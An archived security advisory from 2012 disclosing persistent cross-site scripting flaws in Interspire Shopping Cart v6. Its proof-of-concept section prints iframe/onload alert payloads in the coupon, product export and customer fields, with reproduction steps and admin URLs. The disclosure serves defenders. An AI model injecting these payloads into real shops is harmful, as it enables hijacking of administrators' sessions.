exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Interspire Shopping Cart 6 Cross Site Scripting

Interspire Shopping Cart 6 Cross Site Scripting
Posted Jun 14, 2012
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Interspire Shopping Cart version 6 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 758fb383c3e871e0c1f3c6f0061522f5eb1f8b5b4feed5f223ca53995240772d

Interspire Shopping Cart 6 Cross Site Scripting

Change Mirror Download
Title:
======
Interspire Shopping Cart v6 - Multiple Web Vulnerabilities


Date:
=====
2012-06-03


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=593


VL-ID:
=====
593


Common Vulnerability Scoring System:
====================================
3.5


Introduction:
=============
Interspire Shopping Cart is the most feature rich, all-in-one shopping cart software available.
It has an enterprise-grade feature set and is trusted by more than 15,000 businesses in over 65 countries.

Feature Highlights
Completely browser based
Drag & drop layout editor
Fully SEO optimized by experts
Mobile commerce
Min/max order quantity
Easy-to-use store control panel
Multiple logins with permissions
Refunds & store credits
Tabs on product pages

Sell your products on eBay
Amazingly flexible tax system
Per-product inventory control
90+ designs included
Easily customize your design
Agree to terms to checkout
Shipping zones & options
Sell in multiple currencies
Gift wrapping & messages

Version 6 includes the ability sell on eBay as well as mobile commerce, Mailchimp integration, shopping
comparison export, pre-orders, min/max order quantity and more.

(Copy of the Vendor Homepage: http://www.interspire.com/shoppingcart )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent Web vulnerabilities in Interspire Shopping Cart v6 CMS.


Report-Timeline:
================
2012-06-03: Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
Multiple persistent input validation vulnerabilities are detected in Interspire Shopping Cart v6 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user inter action & privileged user account of the application.
The persistent vulnerabilities are located in the coupon name, product name & the bound export function but also in the
password input profile listing.

Vulnerable Module(s):
[+] Marketing > Coupon > Create a Coupon Code > Name
[+] Products > Name > STRING > View All > Mark Export these Products > x
[+] Customer > Add or Register Customer > Password & Name


Proof of Concept:
=================
The persistent web vulnerabilities can be exploited by remote attackers with privileged user account and low required
user inter action. For demonstration or reproduce ...


Products > Name > STRING > View All > Mark Export these Products > x

<tr class="GridRow" onmouseover="this.className='GridRowOver'" onmouseout="this.className='GridRow'">
<td style="height: 21px;">29</td>
<td style="height: 21px;">"><iframe src="a" onload='alert("VL")' <<="" td="">
<td style="height: 21px;">"><iframe src=a onload=alert("VL") <</td>
<td style="height: 21px;">$32,432.00</td>
<td style="height: 21px;"><img src="images/tick.gif" alt="tick"/></td>
<td style="height: 21px;"><img src="images/cross.gif" alt="cross"/></td>
</tr>
</table>

Note:
1. To reproduce the issue you need to add a product with script code in the name value.
2. The you need to mark the product in the products view all listing and try to export it.
3. The persistent code is getting execute when the export website will be open and processing to load the context.

URL: http://shoppingcart.127.0.0.1:8080/inspire/shop/admin/index.php?ToDo=startExport&t=products


Marketing > Coupon > Create a Coupon Code > Name

<div class="MessageBox MessageBoxError">
A coupon with the name '"><iframe src="http://vuln-lab.com" onload='alert("VL")' <'="" already=""
exists.="" <="" div="">
<p><input type="submit" name="SubmitButton1" value="Save" class="FormButton">
<input type="button" name="CancelButton1" value="Cancel" class="FormButton" onclick="ConfirmCancel()"></p>
</td>

URL: http://shoppingcart.127.0.0.1:8080/inspire/shop/admin/index.php?ToDo=createCoupon2


Customer > Add or Register Customer > Password & Name

<tr>
<td class="FieldLabel">
<span class="Required">*</span> Confirm Password:
</td>
<td><input id="custPasswordConfirm" name="custPasswordConfirm" class="Field250"
value="" type="password"><iframe src="http://vuln-lab.com" onload='alert("VL")' <"="" autocomplete="OFF">

... exported .xml

<?xml version="1.0" encoding="UTF-8"?>
<customers>
<customer>
<Customer_ID><![CDATA[31]]></Customer_ID>
<First_Name><![CDATA["><iframe src=a onload=alert("VL") <]]></First_Name>
<Last_Name><![CDATA["><iframe src=a onload=alert("VL") <]]></Last_Name>
<Company><![CDATA[TEST]]></Company>
<Customer_E-mail><![CDATA[darius@aol.de]]></Customer_E-mail>
<Telephone_1><![CDATA[0713273632]]></Telephone_1>
<Notes><![CDATA["><iframe src=a onload=alert("VL") <]]></Notes>
<Customer_Balance><![CDATA[324325.00]]></Customer_Balance>
<Customer_Group><![CDATA[]]></Customer_Group>
<Customer_Since_Date><![CDATA[02/06/2012]]></Customer_Since_Date>
<Addresses>
<item>
<Address_First_Name><![CDATA["><iframe src=http://vuln-lab.com onload=alert("VL") <]]></Address_First_Name>
<Address_Last_Name><![CDATA["><iframe src=http://vuln-lab.com onload=alert("VL") <]]></Address_Last_Name>
<Address_Company><![CDATA[TEST]]></Address_Company>
<Address_Line_1><![CDATA[TEST]]></Address_Line_1>
<Address_Line_2><![CDATA[TEST]]></Address_Line_2>
<City><![CDATA[TEST]]></City>
<State><![CDATA[TEST]]></State>
<Zip><![CDATA[124325]]></Zip>
<Country><![CDATA[Tuvalu]]></Country>
<Address_Phone><![CDATA[0345435]]></Address_Phone>
</item>
</Addresses>
</customer>
</customers>


Risk:
=====
The security risk of the persistent input validation vulnerabilities are estimated as medium.


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - irc.vulnerability-lab.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab Research Team or its suppliers.

Copyright © 2012 Vulnerability-Lab




--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close